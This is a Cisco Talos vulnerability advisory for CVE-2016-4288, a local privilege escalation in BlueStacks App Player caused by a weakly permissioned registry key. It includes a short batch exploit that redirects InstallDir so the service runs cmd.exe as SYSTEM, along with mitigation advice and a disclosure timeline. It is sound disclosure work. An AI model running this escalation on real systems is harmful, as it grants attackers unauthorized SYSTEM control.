Talos Vulnerability Report

TALOS-2016-0124

BlueStacks App Player Privilege Escalation Vulnerability

August 4, 2016
CVE Number

CVE-2016-4288

Description

A local privilege escalation vulnerability exists in BlueStacks App Player. The BlueStacks App Player installer creates a registry key with weak permissions that allows users to execute arbitrary programs with SYSTEM privileges.

Tested Versions

BlueStacks 2.1.3.5650

Product URLs

http://www.bluestacks.com/

Details

During installation BlueStacks App Player creates registry keys with weak permissions. Here we can see the 'Users' group has full permissions on the InstallDir key:

accesschk -k -w -d HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks

HKLM\SOFTWARE\BlueStacks
  RW BUILTIN\Users
  RW BUILTIN\Administrators
  RW NT\SYSTEM

Using process monitor we can observe that BlueStacks service is reading the InstallDir key to obtain installation path and later executes HD-Network.exe and other files from that path. A malicious user can set InstallDir to a directory under their control to execute arbitrary code with SYSTEM privileges.

Exploit

@echo off
echo [+]Run cmd as SYSTEM
mkdir c:\TALOS
REM Copy others necessary files
copy c:\windows\system32\cmd.exe HD-Network.exe
reg add "HKLM\SOFTWARE\BlueStacks" /f /v "InstallDir" /t REG_SZ /d c:\TALOS\
echo [+]Restore default values

Mitigation

Change the permission for key to group other than Administrator on Read/Execute.

Credit

Discovered by Marcin ëIcewallí Noga of Cisco Talos.

Timeline

2016-03-01 - Discovery
2016—04-13 - Reported
2016-08-04 - Patched
2016-08-04 - Released
Credit

Discovered by Marcin Icewall Noga of Cisco Talos.